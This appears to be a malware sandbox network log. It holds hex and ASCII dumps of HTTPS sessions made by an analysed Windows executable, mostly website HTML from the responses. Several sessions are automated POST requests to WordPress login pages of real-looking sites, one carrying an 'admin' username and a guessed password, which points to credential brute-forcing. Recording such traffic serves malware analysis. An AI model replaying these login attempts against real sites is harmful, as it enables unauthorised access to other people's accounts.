                                                                                                                                                                                                    2023-11-26 05:59:45 UTC16026INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 20 4c 61 73 74 20 50 75 62 6c 69 73 68 65 64 3a 20 54 68 75 20 4e 6f 76 20 32 33 20 32 30 32 33 20 31 34 3a 30 37 3a 33 37 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 0a 20 20 64 61 74 61 2d 77 66 2d 70 61 67 65 3d 22 36 35 35 37 39 32 66 62 30 36 30 66 34 66 34 30 65 33 37 66 62 36 62 64 22 0a 20 20 64 61 74 61 2d 77 66 2d 73 69 74 65 3d 22 36 34 30 30 63 34 39 64 66 66 34 62 34 35 38 36 34 65 38 39 36 61 34 62 22 0a 20 20 6c 61 6e 67 3d 22 65 73 22 0a 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>... Last Published: Thu Nov 23 2023 14:07:37 GMT+0000 (Coordinated Universal Time) --><html data-wf-page="655792fb060f4f40e37fb6bd" data-wf-site="6400c49dff4b45864e896a4b" lang="es"> <head> <meta charset="utf-8" /> <ti
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC16384INData Raw: 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 75 69 2d 74 65 78 74 2d 73 69 7a 65 2d 73 6d 61 6c 6c 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 43 6f 6e 6f 63 65 20 65 6c 20 65 73 74 61 64 6f 20 64 65 20 74 75 20 66 61 63 74 75 72 61 63 69 c3 b3 6e 20 70 6f 72 20 63 6f 6e 74 61 63 74 6f 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: v> <div class="uui-text-size-small-2"> Conoce el estado de tu facturacin por contacto. </div> </div> </a>
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC16384INData Raw: 2f 70 65 72 73 6f 6e 61 6c 69 7a 61 72 2d 66 61 63 74 75 72 61 2e 6a 73 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 6c 6f 6f 70 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 64 69 72 65 63 74 69 6f 6e 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 61 75 74 6f 70 6c 61 79 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 69 73 2d 69 78 32 2d 74 61 72 67 65 74 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 72 65 6e 64 65 72 65 72 3d 22 73 76 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 64 75 72 61 74 69 6f 6e
                                                                                                                                                                                                    Data Ascii: /personalizar-factura.json" data-loop="1" data-direction="1" data-autoplay="1" data-is-ix2-target="0" data-renderer="svg" data-duration
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 74 3d 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 69 6d 61 67 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 77 2d 6e 6f 64 65 2d 5f 35 66 38 65 31 64 33 31 2d 38 66 61 38 2d 64 35 63 31 2d 36 30 34 36 2d 30 37 62 34 31 32 34 39 33 63 37 36 2d 31 32 34 39 33 63 37 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 64 69 76 20 62 67 5f 5f 67 72 65 65 6e 5f 69 6d 61 67 65 20 66 75 6c 6c 2d 63 65 6e 74 65 72 20 72 6f 75 6e 64 65 64 5f 5f 32 30 70 78 22 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: " alt="" class="image" /> </div> <div id="w-node-_5f8e1d31-8fa8-d5c1-6046-07b412493c76-12493c71" class="div bg__green_image full-center rounded__20px"
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC16384INData Raw: 74 65 72 2d 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 49 6e 67 72 65 73 6f 73 20 79 20 67 61 73 74 6f 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 65 73 2f 67 65 73 74 69 6f 6e 2d 63 6f 62 72 6f 73 2d 79 2d 70 61 67 6f 73 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 66 6f 6f 74 65 72 2d 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 43 6f 62 72 6f 73 20 79 20 70 61 67 6f 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 65 73 2f 67 65 73 74 69 6f 6e 2d 63 6c 69 65 6e 74 65 73 2d 70 72 6f 76 65 65 64 6f 72 65 73 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 66 6f 6f 74 65 72 2d 6c 69
                                                                                                                                                                                                    Data Ascii: ter-link" >Ingresos y gastos</a > <a href="es/gestion-cobros-y-pagos" class="link footer-link" >Cobros y pagos</a > <a href="es/gestion-clientes-proveedores" class="link footer-li
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC13079INData Raw: 20 34 30 2e 38 37 34 39 20 33 33 2e 30 35 31 39 20 34 31 2e 30 37 30 35 20 33 33 2e 34 35 33 39 4c 34 31 2e 39 33 39 37 20 33 35 2e 31 39 32 34 43 34 32 2e 30 39 31 38 20 33 35 2e 34 38 35 37 20 34 32 2e 33 37 34 33 20 33 35 2e 36 34 38 37 20 34 32 2e 36 37 38 35 20 33 35 2e 36 34 38 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 33 33 2e 30 39 35 34 20 33 30 2e 34 32 32 35 43 33 33 2e 32 31 34 39 20 33 30 2e 34 32 32 35 20 33 33 2e 33 34 35 33 20 33 30 2e 33 39 20 33 33 2e 34 35 33 39 20 33 30
                                                                                                                                                                                                    Data Ascii: 40.8749 33.0519 41.0705 33.4539L41.9397 35.1924C42.0918 35.4857 42.3743 35.6487 42.6785 35.6487Z" fill="white" ></path> <path d="M33.0954 30.4225C33.2149 30.4225 33.3453 30.39 33.4539 30


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    471192.168.2.45215245.40.150.544436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC382OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: engel-firm.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=cg10ujaipf9k7m41e4afoh39s1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://engel-firm.com/wp-login.php
                                                                                                                                                                                                    Content-Length: 154
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC154OUTData Raw: 6c 6f 67 3d 61 64 6d 69 6e 26 70 77 64 3d 57 65 6c 63 6f 6d 65 32 30 31 36 25 32 34 26 77 70 73 65 63 5f 63 61 70 74 63 68 61 5f 61 6e 73 77 65 72 3d 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 65 6e 67 65 6c 2d 66 69 72 6d 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=admin&pwd=Welcome2016%24&wpsec_captcha_answer=&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fengel-firm.com%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC773INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 67 65 3a 20 30 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sun, 26 Nov 2023 05:59:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeage: 0cache-control: no-store, no-cache, must-revalidatecontent-security-policy: upgrade-in
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC7940INData Raw: 31 65 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 4c 61 77 20 46 69 72 6d 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73
                                                                                                                                                                                                    Data Ascii: 1efc<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Law Firm &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><script type='text/javas
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1600INData Raw: 36 33 39 0d 0a 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 31 33 2e 34 27 20 69 64 3d 27 75 6e 64 65 72 73 63 6f 72 65 2d 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 69 64 3d 27 77 70 2d 75 74 69 6c 2d 6a 73 2d 65 78 74 72 61 27 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 5f 77 70 55 74 69 6c 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 61 6a 61 78 22 3a 7b 22 75 72 6c 22 3a 22 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 7d 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: 639in.js?ver=1.13.4' id='underscore-js'></script><script type='text/javascript' id='wp-util-js-extra'>/* <![CDATA[ */var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}};/* ... */</script><script type='text/javascript' src='https://
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    472192.168.2.452142194.47.252.1154436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC275OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: www.maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: ff59ae34f86788aafc83adbd6fbb16ab=573a080441b430e46540f849b8105044
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.maxiv.lu.se/
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC484INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 6a 73 6f 6e 2f 77 70 2f 76 32 2f 70 61 67 65 73 2f 32 38 3e 3b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 3b 20 74 79
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKdate: Sun, 26 Nov 2023 05:59:45 GMTserver: Apache/2.4.57 (Debian)x-powered-by: PHP/8.2.12link: <https://www.maxiv.lu.se/wp-json/>; rel="https://api.w.org/"link: <https://www.maxiv.lu.se/wp-json/wp/v2/pages/28>; rel="alternate"; ty
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC11668INData Raw: 32 44 38 43 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 4d 41 58 20 49 56 20 26 23 38 32 31 31 3b 20 57 65 20 6d 61 6b 65 20 74 68 65 20 69 6e 76 69 73 69 62
                                                                                                                                                                                                    Data Ascii: 2D8C<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="profile" href="http://gmpg.org/xfn/11"><title>MAX IV &#8211; We make the invisib
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC16314INData Raw: 33 46 42 32 0d 0a 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 3f 76 65 72 3d 35 2e 38 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6f 6b 69 65 2d 6c 61 77 2d 69 6e 66 6f 2f 6c 65 67 61 63 79 2f 70 75 62 6c 69 63 2f 63 73 73 2f 63 6f 6f 6b 69 65 2d 6c 61 77 2d 69 6e 66 6f 2d 70 75 62 6c 69 63 2e 63 73 73 3f 76 65 72 3d 33 2e 31 2e 36 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 6c 61 77 2d 69 6e 66 6f
                                                                                                                                                                                                    Data Ascii: 3FB2e/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.8.2' media='all' /><link rel="stylesheet" href="https://www.maxiv.lu.se/wp-content/plugins/cookie-law-info/legacy/public/css/cookie-law-info-public.css?ver=3.1.6" id="cookie-law-info
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC1225INData Raw: 34 43 32 0d 0a 2e 35 36 7a 4d 34 35 30 2e 34 34 20 32 38 31 2e 38 31 63 31 34 2e 32 34 2d 33 38 2e 36 39 20 33 32 2e 37 37 2d 36 31 2e 37 39 20 34 39 2e 35 36 2d 36 31 2e 37 39 73 33 35 2e 33 32 20 32 33 2e 31 20 34 39 2e 35 36 20 36 31 2e 37 39 63 33 2e 37 32 20 31 30 2e 31 31 20 37 2e 30 36 20 32 31 20 31 30 20 33 32 2e 35 32 2d 31 39 2e 33 34 20 34 2e 39 38 2d 33 39 2e 33 34 20 31 31 2e 33 35 2d 35 39 2e 35 37 20 31 39 2e 30 31 2d 32 30 2e 32 33 2d 37 2e 36 35 2d 34 30 2e 32 32 2d 31 34 2e 30 33 2d 35 39 2e 35 37 2d 31 39 20 32 2e 39 36 2d 31 31 2e 35 33 20 36 2e 33 2d 32 32 2e 34 32 20 31 30 2e 30 32 2d 33 32 2e 35 33 7a 4d 35 37 35 20 34 34 39 2e 35 63 30 20 31 36 2e 37 33 2d 2e 36 33 20 33 33 2e 31 38 2d 31 2e 38 35 20 34 39 2e 31 36 61 36 33 33 2e
                                                                                                                                                                                                    Data Ascii: 4C2.56zM450.44 281.81c14.24-38.69 32.77-61.79 49.56-61.79s35.32 23.1 49.56 61.79c3.72 10.11 7.06 21 10 32.52-19.34 4.98-39.34 11.35-59.57 19.01-20.23-7.65-40.22-14.03-59.57-19 2.96-11.53 6.3-22.42 10.02-32.53zM575 449.5c0 16.73-.63 33.18-1.85 49.16a633.
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC10792INData Raw: 32 41 32 30 0d 0a 32 34 2e 35 20 37 2e 30 34 2d 31 2e 32 37 2e 35 38 2d 32 2e 35 34 20 31 2e 31 36 2d 33 2e 38 31 20 31 2e 37 35 61 36 39 34 2e 38 36 20 36 39 34 2e 38 36 20 30 20 30 20 30 2d 32 34 2e 30 31 20 31 31 2e 37 39 7a 6d 31 31 34 2e 35 33 2d 31 31 2e 37 38 63 2d 31 2e 32 37 2d 2e 35 39 2d 32 2e 35 34 2d 31 2e 31 37 2d 33 2e 38 31 2d 31 2e 37 35 20 38 2e 32 37 2d 32 2e 36 20 31 36 2e 34 35 2d 34 2e 39 35 20 32 34 2e 35 2d 37 2e 30 34 20 31 2e 32 33 20 36 2e 37 31 20 32 2e 33 34 20 31 33 2e 35 38 20 33 2e 33 32 20 32 30 2e 35 39 2d 37 2e 38 36 2d 34 2e 30 37 2d 31 35 2e 38 36 2d 38 2d 32 34 2e 30 31 2d 31 31 2e 38 7a 6d 2d 32 31 38 2e 37 33 20 37 32 2e 35 32 63 2d 32 38 2e 39 36 2d 32 39 2e 36 31 2d 34 31 2e 38 35 2d 35 36 2e 36 39 2d 33 34 2e 35
                                                                                                                                                                                                    Data Ascii: 2A2024.5 7.04-1.27.58-2.54 1.16-3.81 1.75a694.86 694.86 0 0 0-24.01 11.79zm114.53-11.78c-1.27-.59-2.54-1.17-3.81-1.75 8.27-2.6 16.45-4.95 24.5-7.04 1.23 6.71 2.34 13.58 3.32 20.59-7.86-4.07-15.86-8-24.01-11.8zm-218.73 72.52c-28.96-29.61-41.85-56.69-34.5
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC16314INData Raw: 33 46 42 32 0d 0a 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 32 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 75 73 65 72 2d 61 63 63 65 73 73 2f 63 61 6c 6c 2d 66 6f 72 2d 70 72 6f 70 6f 73 61 6c 73 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 20 66 6f 72 20 70 72 6f 70 6f 73 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 69 74 65 6d 2d 64 65 70 74 68
                                                                                                                                                                                                    Data Ascii: 3FB2item-object-page item-depth-2'><a href="https://www.maxiv.lu.se/user-access/call-for-proposals/" class="menu-item-label">Call for proposals</a></li><li class='menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children item-depth
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC28INData Raw: 34 30 0d 0a 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72
                                                                                                                                                                                                    Data Ascii: 40ial-icon submenu-toggler
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC42INData Raw: 20 64 2d 6e 6f 6e 65 20 6d 69 6e 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 0d 0a
                                                                                                                                                                                                    Data Ascii: d-none minus-icon" aria-hidden="true"><
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC16272INData Raw: 33 46 38 38 0d 0a 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 72 65 6d 6f 76 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 75 6c 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 69 74 65 6d 2d 64 65 70 74 68 2d 35 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61 6d 6c 69 6e 65 73 2f 62 61 6c 64 65 72 2f 73 63 69 65 6e 63 65 2d 61 74 2d 62 61
                                                                                                                                                                                                    Data Ascii: 3F88span class="material-icons-sharp">remove</span></span><ul><li class='menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children item-depth-5'><a href="https://www.maxiv.lu.se/beamlines-accelerators/beamlines/balder/science-at-ba
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC16320INData Raw: 33 46 42 38 0d 0a 74 6f 6d 61 78 2f 75 73 65 72 2d 69 6e 66 6f 72 6d 61 74 69 6f 6e 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 55 73 65 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 61 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20 70 6c 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 61 64 64 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20 64 2d 6e 6f 6e 65 20 6d 69 6e 75 73
                                                                                                                                                                                                    Data Ascii: 3FB8tomax/user-information/" class="menu-item-label">User information</a><span class="material-icon submenu-toggler plus-icon" aria-hidden="true"><span class="material-icons-sharp">add</span></span><span class="material-icon submenu-toggler d-none minus


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    473192.168.2.452222144.202.62.1314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC356OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: gruporegiosafety.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
